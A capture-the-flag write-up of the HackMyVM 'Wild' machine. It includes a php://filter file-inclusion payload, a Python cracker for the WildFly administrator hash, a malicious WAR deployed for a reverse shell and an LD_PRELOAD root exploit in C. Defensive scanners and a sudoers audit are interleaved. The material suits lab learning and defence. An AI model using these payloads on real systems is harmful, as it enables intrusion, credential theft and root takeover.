HackMyVM : Wild

mrwhitecap
7 min read · Feb 16, 2024


Wild

Nmap:

└─$ nmap -sC -sV 192.168.1.8
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 17:13 EST
Nmap scan report for 192.168.1.8
Host is up (0.00060s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: burger html5 landing page
8080/tcp open http-proxy
|_http-open-proxy: Proxy might be redirecting requests
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Connection: close
| Content-Length: 74
| Content-Type: text/html
| Date: Thu, 15 Feb 2024 22:14:06 GMT
| <html><head><title>Error</title></head><body>404 - Not Found</body></html>
| GetRequest:
| HTTP/1.1 200 OK
| Connection: close
| Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT
| Content-Length: 1590
| Content-Type: text/html
| Accept-Ranges: bytes
| Date: Thu, 15 Feb 2024 22:14:06 GMT
| <!--
| Copyright The WildFly Authors
| SPDX-License-Identifier: Apache-2.0
| <!DOCTYPE html>
| <html>
| <head>
| <!-- proper charset -->
| <meta http-equiv="content-type" content="text/html;charset=utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
| <title>Welcome to WildFly</title>
| <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
| <link rel="StyleSheet" href="wildfly.css" type="text/css">
| </head>
| <body>
| <div class="wrapper">
| <div class="content">
| <div class="logo">
| <img src="wildfly_logo.png" alt="WildFly" border="0" />
| </div>
| <h1>Welcome to WildFly</h1>
| <h3>Your WildFly instance is ru
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| Allow: GET, HEAD, POST
| Connection: close
| Content-Length: 83
| Content-Type: text/html
| Date: Thu, 15 Feb 2024 22:14:06 GMT
| <html><head><title>Error</title></head><body>405 - Method Not Allowed</body></html>
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Length: 0
|_ Connection: close
|_http-title: Welcome to WildFly
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2024-02-15T22:01:24
|_Not valid after: 2034-02-12T22:01:24
| tls-alpn:
|_ http/1.1
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Connection: close
| Content-Length: 74
| Content-Type: text/html
| Date: Thu, 15 Feb 2024 22:14:12 GMT
| <html><head><title>Error</title></head><body>404 - Not Found</body></html>
| GetRequest:
| HTTP/1.1 200 OK
| Connection: close
| Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT
| Content-Length: 1590
| Content-Type: text/html
| Accept-Ranges: bytes
| Date: Thu, 15 Feb 2024 22:14:12 GMT
| <!--
| Copyright The WildFly Authors
| SPDX-License-Identifier: Apache-2.0
| <!DOCTYPE html>
| <html>
| <head>
| <!-- proper charset -->
| <meta http-equiv="content-type" content="text/html;charset=utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
| <title>Welcome to WildFly</title>
| <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
| <link rel="StyleSheet" href="wildfly.css" type="text/css">
| </head>
| <body>
| <div class="wrapper">
| <div class="content">
| <div class="logo">
| <img src="wildfly_logo.png" alt="WildFly" border="0" />
| </div>
| <h1>Welcome to WildFly</h1>
| <h3>Your WildFly instance is ru
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| Allow: GET, HEAD, POST
| Connection: close
| Content-Length: 83
| Content-Type: text/html
| Date: Thu, 15 Feb 2024 22:14:12 GMT
|_ <html><head><title>Error</title></head><body>405 - Method Not Allowed</body></html>
|_http-title: Welcome to WildFly
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.94%I=7%D=2/15%Time=65CE8CAD%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,6F4,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20close\r\nLast-Mo
SF:dified:\x20Wed,\x2018\x20Oct\x202023\x2006:43:38\x20GMT\r\nContent-Leng
SF:th:\x201590\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x20bytes\r\
SF:nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14:06\x20GMT\r\n\r\n<!--\n\x2
SF:0\x20~\x20Copyright\x20The\x20WildFly\x20Authors\n\x20\x20~\x20SPDX-Lic
SF:ense-Identifier:\x20Apache-2\.0\n\x20\x20-->\n\n<!DOCTYPE\x20html>\n\n<
SF:html>\n<head>\n\x20\x20\x20\x20<!--\x20proper\x20charset\x20-->\n\x20\x
SF:20\x20\x20<meta\x20http-equiv=\"content-type\"\x20content=\"text/html;c
SF:harset=utf-8\"\x20/>\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compat
SF:ible\"\x20content=\"IE=EmulateIE8\"\x20/>\n\n\x20\x20\x20\x20<title>Wel
SF:come\x20to\x20WildFly</title>\n\x20\x20\x20\x20<link\x20rel=\"shortcut\
SF:x20icon\"\x20href=\"favicon\.ico\"\x20type=\"image/x-icon\">\n\x20\x20\
SF:x20\x20<link\x20rel=\"StyleSheet\"\x20href=\"wildfly\.css\"\x20type=\"t
SF:ext/css\">\n</head>\n\n<body>\n<div\x20class=\"wrapper\">\n\x20\x20\x20
SF:\x20<div\x20class=\"content\">\n\x20\x20\x20\x20\x20\x20\x20\x20<div\x2
SF:0class=\"logo\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20<img\x20src=\"wildfly_logo\.png\"\x20alt=\"WildFly\"\x20bord
SF:er=\"0\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20<h1>Welcome\x20to\x20WildFly</h1>\n\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<h3>Your\x20WildFly\x20instance\x20is\x20ru")%r(HTTPOpti
SF:ons,F3,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nAllow:\x20GET,\
SF:x20HEAD,\x20POST\r\nConnection:\x20close\r\nContent-Length:\x2083\r\nCo
SF:ntent-Type:\x20text/html\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14
SF::06\x20GMT\r\n\r\n<html><head><title>Error</title></head><body>405\x20-
SF:\x20Method\x20Not\x20Allowed</body></html>")%r(RTSPRequest,42,"HTTP/1\.
SF:1\x20400\x20Bad\x20Request\r\nContent-Length:\x200\r\nConnection:\x20cl
SF:ose\r\n\r\n")%r(FourOhFourRequest,C9,"HTTP/1\.1\x20404\x20Not\x20Found\
SF:r\nConnection:\x20close\r\nContent-Length:\x2074\r\nContent-Type:\x20te
SF:xt/html\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14:06\x20GMT\r\n\r\
SF:n<html><head><title>Error</title></head><body>404\x20-\x20Not\x20Found<
SF:/body></html>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.94%T=SSL%I=7%D=2/15%Time=65CE8CB4%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,6F4,"HTTP/1\.1\x20200\x20OK\r\nConnection:\x20close\r\nL
SF:ast-Modified:\x20Wed,\x2018\x20Oct\x202023\x2006:43:38\x20GMT\r\nConten
SF:t-Length:\x201590\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x20by
SF:tes\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2022:14:12\x20GMT\r\n\r\n<!-
SF:-\n\x20\x20~\x20Copyright\x20The\x20WildFly\x20Authors\n\x20\x20~\x20SP
SF:DX-License-Identifier:\x20Apache-2\.0\n\x20\x20-->\n\n<!DOCTYPE\x20html
SF:>\n\n<html>\n<head>\n\x20\x20\x20\x20<!--\x20proper\x20charset\x20-->\n
SF:\x20\x20\x20\x20<meta\x20http-equiv=\"content-type\"\x20content=\"text/
SF:html;charset=utf-8\"\x20/>\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-
SF:Compatible\"\x20content=\"IE=EmulateIE8\"\x20/>\n\n\x20\x20\x20\x20<tit
SF:le>Welcome\x20to\x20WildFly</title>\n\x20\x20\x20\x20<link\x20rel=\"sho
SF:rtcut\x20icon\"\x20href=\"favicon\.ico\"\x20type=\"image/x-icon\">\n\x2
SF:0\x20\x20\x20<link\x20rel=\"StyleSheet\"\x20href=\"wildfly\.css\"\x20ty
SF:pe=\"text/css\">\n</head>\n\n<body>\n<div\x20class=\"wrapper\">\n\x20\x
SF:20\x20\x20<div\x20class=\"content\">\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:div\x20class=\"logo\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20<img\x20src=\"wildfly_logo\.png\"\x20alt=\"WildFly\"\x
SF:20border=\"0\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20<h1>Welcome\x20to\x20WildFly</h1>\n\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<h3>Your\x20WildFly\x20instance\x20is\x20ru")%r(HT
SF:TPOptions,F3,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nAllow:\x2
SF:0GET,\x20HEAD,\x20POST\r\nConnection:\x20close\r\nContent-Length:\x2083
SF:\r\nContent-Type:\x20text/html\r\nDate:\x20Thu,\x2015\x20Feb\x202024\x2
SF:022:14:12\x20GMT\r\n\r\n<html><head><title>Error</title></head><body>40
SF:5\x20-\x20Method\x20Not\x20Allowed</body></html>")%r(FourOhFourRequest,
SF:C9,"HTTP/1\.1\x20404\x20Not\x20Found\r\nConnection:\x20close\r\nContent
SF:-Length:\x2074\r\nContent-Type:\x20text/html\r\nDate:\x20Thu,\x2015\x20
SF:Feb\x202024\x2022:14:12\x20GMT\r\n\r\n<html><head><title>Error</title><
SF:/head><body>404\x20-\x20Not\x20Found</body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.19 seconds

Port 80:

Visited: http://192.168.1.8

Found recipe.php with a DirBuster search.

Visited: http://192.168.1.8/recipe.php

Got three more pages.

Let's check Fatty burger.

Looks like the php://filter wrapper works here.

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter

$ curl http://192.168.1.8/recipe.php?file=pHp://FilTer/convert.base64-encode/resource=/etc/passwd

Let's decode that base64.

It's working.
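From the defender's side, the request above is easy to spot in the web server's access log once the parameter value is normalised. The following Python scanner is an added example, not code from the writeup: it parses Apache combined-log lines, percent-decodes each query parameter until stable (so double encoding does not hide anything), lower-cases it (the writeup's pHp://FilTer spelling would otherwise slip past a naive string match) and flags PHP stream wrappers, path traversal and absolute paths. The log lines are constructed for the example; only the `file` parameter name and recipe.php come from the page.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (sample data, not from the writeup's target).
SAMPLE_LOG = """\
192.168.1.20 - - [15/Feb/2024:17:20:01 -0500] "GET /recipe.php?file=fatty.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
192.168.1.20 - - [15/Feb/2024:17:21:07 -0500] "GET /recipe.php?file=pHp://FilTer/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2410 "-" "curl/8.4.0"
192.168.1.20 - - [15/Feb/2024:17:21:30 -0500] "GET /recipe.php?file=%70%48%70%3a%2f%2ffilter/resource=index.php HTTP/1.1" 200 900 "-" "curl/8.4.0"
192.168.1.20 - - [15/Feb/2024:17:22:02 -0500] "GET /recipe.php?file=....//....//etc/passwd HTTP/1.1" 200 2410 "-" "curl/8.4.0"
192.168.1.20 - - [15/Feb/2024:17:22:40 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# PHP stream wrappers; none of them belongs in a parameter that names a local file.
WRAPPER_RE = re.compile(r"^\s*(php|data|expect|phar|zip|glob|file|compress\.zlib)://")

def normalise(value, rounds=3):
    """Percent-decode until stable (defeats double encoding), then lower-case."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()

def classify(value):
    """Return a reason if a parameter value looks like file-inclusion abuse, else None."""
    v = normalise(value)
    if WRAPPER_RE.match(v):
        return "stream wrapper"
    if "../" in v or "..\\" in v:
        return "path traversal"
    if v.startswith("/etc/") or v.startswith("/proc/"):
        return "absolute path"
    return None

def parse_line(line):
    """Split one combined-log line into client IP, path, query parameters and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "path": target.path,
        "params": parse_qs(target.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }

def scan_log(text):
    """Return (line_no, ip, path, parameter, reason) for every suspicious request."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for value in values:
                reason = classify(value)
                if reason:
                    findings.append((n, rec["ip"], rec["path"], name, reason))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same normalisation belongs in the application itself: recipe.php should resolve `file` against an allowlist of recipe names rather than passing it to include(), which removes the wrapper problem entirely instead of trying to filter spellings of php://.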

Port 8080:

Visited: http://192.168.1.8:8080/

Clicked on the Administrative Console and got redirected to http://192.168.1.8:9990/console/index.html

Visited: http://192.168.1.8:9990/console/index.html

Visited: https://docs.wildfly.org/19/Admin_Guide.html#security-realm-authentication

WildFly spreads its configuration over several directories on the machine, and its property files live in them, so let's find the directory that holds the interesting ones…

After many tries I found that /opt/wildfly/domain/configuration/mgmt-users.properties has something interesting for us:

$ curl http://192.168.1.11/recipe.php?file=pHp://FilTer/convert.base64-encode/resource=/opt/wildfly/domain/configuration/mgmt-users.properties

Got the base64. Let's decode it:

administrator=3bfa7f34174555fe766d0e0295821742

Got the hash for user administrator.

So we wrote a Python script to crack the above MD5 hash. WildFly stores each management user as HEX(MD5(username:realm:password)), with the realm here being ManagementRealm, so the script hashes every candidate password the same way and compares the result.

hash.py

import hashlib

def generate_hash(username, realm, password):
    # WildFly stores HEX(MD5("username:realm:password")) in mgmt-users.properties
    concat_str = f"{username}:{realm}:{password}"
    return hashlib.md5(concat_str.encode('utf-8')).hexdigest()

def main():
    username = "administrator"
    realm = "ManagementRealm"
    known_hash = "3bfa7f34174555fe766d0e0295821742"

    password_file = "rockyou.txt"

    try:
        with open(password_file, 'rb') as file:
            for line_b in file:
                try:
                    line = line_b.decode('utf-8').strip()
                except UnicodeDecodeError:
                    # latin1 maps every byte value, so this fallback cannot fail
                    line = line_b.decode('latin1').strip()

                current_hash = generate_hash(username, realm, line)
                if current_hash == known_hash:
                    print(f"Password Found: {line}")
                    break
    except FileNotFoundError:
        print(f"File not found: {password_file}")

if __name__ == "__main__":
    main()

After running the Python file…

Our Python script cracked the hash successfully.

administrator : katarina9

Using those administrator creds we logged in to the console…

The deployment page shows that we can only deploy EJB-jar, war and ear files.

So let's make a malicious war file to deploy through the console.

Reference: https://github.com/KINGSABRI/godofwar

Found on a Google search.

Let's install godofwar and create a shell.war file to get a reverse shell.

Create the shell.war

Let's click on Upload Deployment and select the shell.war file.

Then, after opening a netcat listener on the given port number, access shell.jsp through the web.

Received the reverse shell.
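The natural control against the deployment step above is to inspect archives before the container accepts them. The Python check below is an added example, not part of the writeup, godofwar or WildFly: it opens a WAR (which is an ordinary zip file), flags entry names that would escape the deployment directory, and scans JSP pages for process-spawning and reflection primitives that have no place in a normal page. The sample archives are built in memory and constructed for the example; `scan_war` and `build_war` are names chosen here.

```python
import io
import re
import zipfile

# Source patterns that are rarely legitimate in a JSP page and typical of web shells.
SUSPICIOUS_JSP = [
    (re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec"), "Runtime.exec"),
    (re.compile(r"new\s+ProcessBuilder\s*\("), "ProcessBuilder"),
    (re.compile(r"new\s+(?:java\.net\.)?Socket\s*\("), "raw socket"),
    (re.compile(r"Class\s*\.\s*forName\s*\("), "reflective class loading"),
]
SCRIPT_SUFFIXES = (".jsp", ".jspx", ".jspf")

def scan_war(war_bytes):
    """Inspect an in-memory WAR and return [(entry_name, reason), ...]."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Zip entries can carry traversal names ("zip slip"); flag and skip them.
            if name.startswith("/") or ".." in name.split("/"):
                findings.append((name, "unsafe entry path"))
                continue
            if not name.lower().endswith(SCRIPT_SUFFIXES):
                continue
            source = zf.read(info).decode("utf-8", errors="replace")
            for pattern, label in SUSPICIOUS_JSP:
                if pattern.search(source):
                    findings.append((name, label))
    return findings

def build_war(entries):
    """Assemble a WAR (plain zip) from {entry_name: bytes}; used only to make sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed samples: an ordinary page and a page that spawns a process.
BENIGN_WAR = build_war({
    "WEB-INF/web.xml": b"<web-app/>",
    "index.jsp": b"<html><body>Today is <%= new java.util.Date() %></body></html>",
})
SHELL_WAR = build_war({
    "WEB-INF/web.xml": b"<web-app/>",
    "shell.jsp": b'<%@ page import="java.io.*" %><% Runtime.getRuntime().exec("id"); %>',
})

if __name__ == "__main__":
    for label, war in (("benign", BENIGN_WAR), ("shell", SHELL_WAR)):
        print(label, scan_war(war))
```

Pattern matching on JSP source is a coarse filter and will not catch obfuscated pages, so it complements rather than replaces the real fix on this box: the management console should not be reachable with a password that falls to a wordlist, and deployment rights should be limited to a CI identity rather than an interactive administrator account.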

Let's check SUID permissions…

Created the exploit.c file on the target machine.

exploit.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() and setgid() */

/* Runs as the library's initialiser when it is preloaded (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}

Compile exploit.c using:

$ gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles

exploit.c successfully compiled.

It gives us exploit.so as the output file.

Let's run that exploit.so file using /usr/bin/info:

$ sudo LD_PRELOAD=./exploit.so /usr/bin/info

Boom! Rooted…
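The final step only works because sudo was configured to hand LD_PRELOAD through to the command; by default sudo strips dynamic-loader variables unless the sudoers file preserves them with env_keep or grants SETENV. As an added defender-side example, not from the writeup, the Python audit below parses a sudoers excerpt and reports env_keep entries for loader variables, an explicitly disabled env_reset, and SETENV rules. The sudoers text, the user names and the helper names (parse_sudoers, audit) are assumptions made for the example; only the /usr/bin/info rule mirrors the page.

```python
import re

# Constructed /etc/sudoers excerpt that shows the risky pattern (not the machine's real file).
SAMPLE_SUDOERS = """\
# Defaults
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults        env_keep += "LD_PRELOAD"
Defaults        env_keep += "LANG LC_ALL"

root    ALL=(ALL:ALL) ALL
wild    ALL=(root) NOPASSWD: /usr/bin/info
alice   ALL=(root) SETENV: /usr/bin/less
"""

# Variables through which the dynamic loader will load caller-controlled code.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}

ENV_KEEP_RE = re.compile(r'^Defaults\b.*?\benv_keep\s*([-+]?=)\s*"?([^"]*)"?\s*$')
USER_SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Reduce a sudoers file to the pieces that matter for environment handling."""
    env_keep = set()
    env_reset_disabled = False
    user_specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        if line.startswith("Defaults"):
            if re.search(r"!\s*env_reset\b", line):
                env_reset_disabled = True
            m = ENV_KEEP_RE.match(line)
            if m:
                op, names = m.group(1), set(m.group(2).split())
                if op == "+=":
                    env_keep |= names
                elif op == "-=":
                    env_keep -= names
                else:
                    env_keep = names
            continue
        m = USER_SPEC_RE.match(line)
        if m:
            user_specs.append({
                "who": m.group("who"),
                "runas": m.group("runas"),
                "tags": set(re.findall(r"[A-Z]+", m.group("tags"))),
                "cmds": m.group("cmds").strip(),
            })
    return {"env_reset_disabled": env_reset_disabled,
            "env_keep": env_keep, "user_specs": user_specs}

def audit(text):
    """Return human-readable findings for environment-related sudoers weaknesses."""
    cfg = parse_sudoers(text)
    findings = []
    leaked = sorted(cfg["env_keep"] & LOADER_VARS)
    if leaked:
        findings.append("env_keep preserves loader variables: " + ", ".join(leaked))
    if cfg["env_reset_disabled"]:
        findings.append("env_reset is explicitly disabled; the caller's environment reaches every command")
    for spec in cfg["user_specs"]:
        if "SETENV" in spec["tags"]:
            findings.append(f"{spec['who']} may set arbitrary environment variables for: {spec['cmds']}")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS):
        print("FINDING:", finding)
```

With the LD_PRELOAD entry removed from env_keep, the `sudo LD_PRELOAD=./exploit.so /usr/bin/info` command from the writeup runs info with a clean environment and the preloaded library is never mapped; the audit is meant to be run over `/etc/sudoers` and every file under `/etc/sudoers.d`.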
